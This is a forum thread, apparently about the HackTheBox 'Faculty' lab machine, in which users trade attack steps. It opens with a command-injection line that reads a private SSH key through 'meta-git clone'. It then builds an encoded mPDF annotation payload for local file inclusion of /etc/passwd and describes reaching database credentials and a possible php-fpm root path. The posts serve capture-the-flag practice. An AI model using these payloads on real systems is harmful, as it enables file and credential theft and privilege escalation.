sudo -u developer /usr/local/bin/meta-git clone 'test||cat /home/developer/.ssh/id_rsa'

[quote="Exa" pid='118037' dateline='1656800466'][quote="Anandu" pid="118020" dateline="1656799923"][quote="Exa" pid="118005" dateline="1656799398"][quote="Bumper111" pid="117987" dateline="1656798013"]For file readhttps://medium.com/@jonathanbouman/local-file-inclusion-at-ikea-com-e695ed64d82f[/quote]Nice, this one works for me. Minus the backslashes:[/quote]Sending it base64'd via /admin/download.php or adding entry in faculty.php?[/quote]Sending via /admin/download.php.https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPgpdf=JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGFzc3dkJTI1MjIlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1MjB0aXRsZT0lMjUyMkF0dGFjaGVkJTI1MjBGaWxlOiUyNTIwL2V0Yy9wYXNzd2QlMjUyMiUyNTIwcG9zLXg9JTI1MjIxOTUlMjUyMiUyNTIwLyUyNTNF[/quote]I logged in as administrator, tried to send base64 string to /admin/download.php?pdf=, am I doing something wrong?

[quote="quick443" pid="118349" dateline="1656814649"][quote="Exa" pid="118037" dateline="1656800466"][quote="Anandu" pid="118020" dateline="1656799923"][quote="Exa" pid="118005" dateline="1656799398"][quote="Bumper111" pid="117987" dateline="1656798013"]For file readhttps://medium.com/@jonathanbouman/local-file-inclusion-at-ikea-com-e695ed64d82f[/quote]Nice, this one works for me. Minus the backslashes:[/quote]Sending it base64'd via /admin/download.php or adding entry in faculty.php?[/quote]Sending via /admin/download.php.https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPgpdf=JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGFzc3dkJTI1MjIlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1MjB0aXRsZT0lMjUyMkF0dGFjaGVkJTI1MjBGaWxlOiUyNTIwL2V0Yy9wYXNzd2QlMjUyMiUyNTIwcG9zLXg9JTI1MjIxOTUlMjUyMiUyNTIwLyUyNTNF[/quote]I logged in as administrator, tried to send base64 string to /admin/download.php?pdf=, am I doing something wrong?[/quote]You need to use Burp to intercept the request then modify it with base64 data and forward it.

[quote="Himitsu" pid='118369' dateline='1656815249'][quote="quick443" pid="118349" dateline="1656814649"][quote="Exa" pid="118037" dateline="1656800466"][quote="Anandu" pid="118020" dateline="1656799923"][quote="Exa" pid="118005" dateline="1656799398"]Nice, this one works for me. Minus the backslashes:[/quote]Sending it base64'd via /admin/download.php or adding entry in faculty.php?[/quote]Sending via /admin/download.php.https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPgpdf=JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGFzc3dkJTI1MjIlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1MjB0aXRsZT0lMjUyMkF0dGFjaGVkJTI1MjBGaWxlOiUyNTIwL2V0Yy9wYXNzd2QlMjUyMiUyNTIwcG9zLXg9JTI1MjIxOTUlMjUyMiUyNTIwLyUyNTNF[/quote]I logged in as administrator, tried to send base64 string to /admin/download.php?pdf=, am I doing something wrong?[/quote]You need to use Burp to intercept the request then modify it with base64 data and forward it.[/quote]blank pdf, I'll keep trying

(July 3, 2022, 03:38 AM)quick443 Wrote:

(July 3, 2022, 02:27 AM)Himitsu Wrote:

(July 3, 2022, 02:17 AM)quick443 Wrote:

(July 2, 2022, 10:21 PM)Exa Wrote:

(July 2, 2022, 10:12 PM)Anandu Wrote: Sending it base64'd via /admin/download.php or adding entry in faculty.php?

Sending via /admin/download.php.

https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPg

pdf=JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGFzc3dkJTI1MjIlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1MjB0aXRsZT0lMjUyMkF0dGFjaGVkJTI1MjBGaWxlOiUyNTIwL2V0Yy9wYXNzd2QlMjUyMiUyNTIwcG9zLXg9JTI1MjIxOTUlMjUyMiUyNTIwLyUyNTNF

I logged in as administrator, tried to send base64 string to /admin/download.php?pdf=, am I doing something wrong?

You need to use Burp to intercept the request then modify it with base64 data and forward it.

blank pdf, I'll keep trying

The annotation gets added as a dot. Best to download the file, open it in a pdf reader (and not the browser). Once I did that, I was able to see the attached file on the pdf

thanks

(July 3, 2022, 03:50 AM)ryzen Wrote:

(July 3, 2022, 03:38 AM)quick443 Wrote:

(July 3, 2022, 02:27 AM)Himitsu Wrote:

(July 3, 2022, 02:17 AM)quick443 Wrote:

(July 2, 2022, 10:21 PM)Exa Wrote: Sending via /admin/download.php.

https://gchq.github.io/CyberChef/#recipe=URL_Encode(false)URL_Encode(false)To_Base64('A-Za-z0-9%2B/%3D')&input=PGFubm90YXRpb24gZmlsZT0iL2V0Yy9wYXNzd2QiIGNvbnRlbnQ9Ii9ldGMvcGFzc3dkIiBpY29uPSJHcmFwaCIgdGl0bGU9IkF0dGFjaGVkIEZpbGU6IC9ldGMvcGFzc3dkIiBwb3MteD0iMTk1IiAvPg

pdf=JTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGFzc3dkJTI1MjIlMjUyMGljb249JTI1MjJHcmFwaCUyNTIyJTI1MjB0aXRsZT0lMjUyMkF0dGFjaGVkJTI1MjBGaWxlOiUyNTIwL2V0Yy9wYXNzd2QlMjUyMiUyNTIwcG9zLXg9JTI1MjIxOTUlMjUyMiUyNTIwLyUyNTNF

I logged in as administrator, tried to send base64 string to /admin/download.php?pdf=, am I doing something wrong?

You need to use Burp to intercept the request then modify it with base64 data and forward it.

blank pdf, I'll keep trying

The annotation gets added as a dot. Best to download the file, open it in a pdf reader (and not the browser). Once I did that, I was able to see the attached file on the pdf

Thanks, do you recommend any that work? the one that comes by default does not work

(July 3, 2022, 04:07 AM)quick443 Wrote:

(July 3, 2022, 03:50 AM)ryzen Wrote:

(July 3, 2022, 03:38 AM)quick443 Wrote:

(July 3, 2022, 02:27 AM)Himitsu Wrote:

(July 3, 2022, 02:17 AM)quick443 Wrote: I logged in as administrator, tried to send base64 string to /admin/download.php?pdf=, am I doing something wrong?

You need to use Burp to intercept the request then modify it with base64 data and forward it.

blank pdf, I'll keep trying

The annotation gets added as a dot. Best to download the file, open it in a pdf reader (and not the browser). Once I did that, I was able to see the attached file on the pdf

Thanks, do you recommend any that work? the one that comes by default does not work

I'm running on Parrot OS. I used whatever is default(Atril Document Viewer). Another comment mentioned, you can use firefox and then open the sidebar in the pdf view

(July 2, 2022, 11:21 PM)OldName2 Wrote: I cant see the path from LFI to SSH-Key, is there a different approach?

Sadly, using the leaked SSH key, people skipped a couple of steps.

Here is my approach what to do after the LFI:

Login and open http://faculty.htb/index.php. You will see this request in Burp:
POST /admin/ajax.php?action=get_schecdule
It has the body parameter faculty_id=1.
When I change it to "test, I can see a stack trace which reveals the full path:
/var/www/scheduling/admin/admin_class.php

Knowing the full path, I downloaded /var/www/scheduling/index.php using the mpdf exploit. From there you can find the DB credentials.

For root, my best guess as of now is that we have to abuse the php-fpm master process running as root. Found this
https://www.ambionics.io/blog/php-fpm-local-root
Although by now, I'm also wondering if this is a rabbit hole I've gotten myself into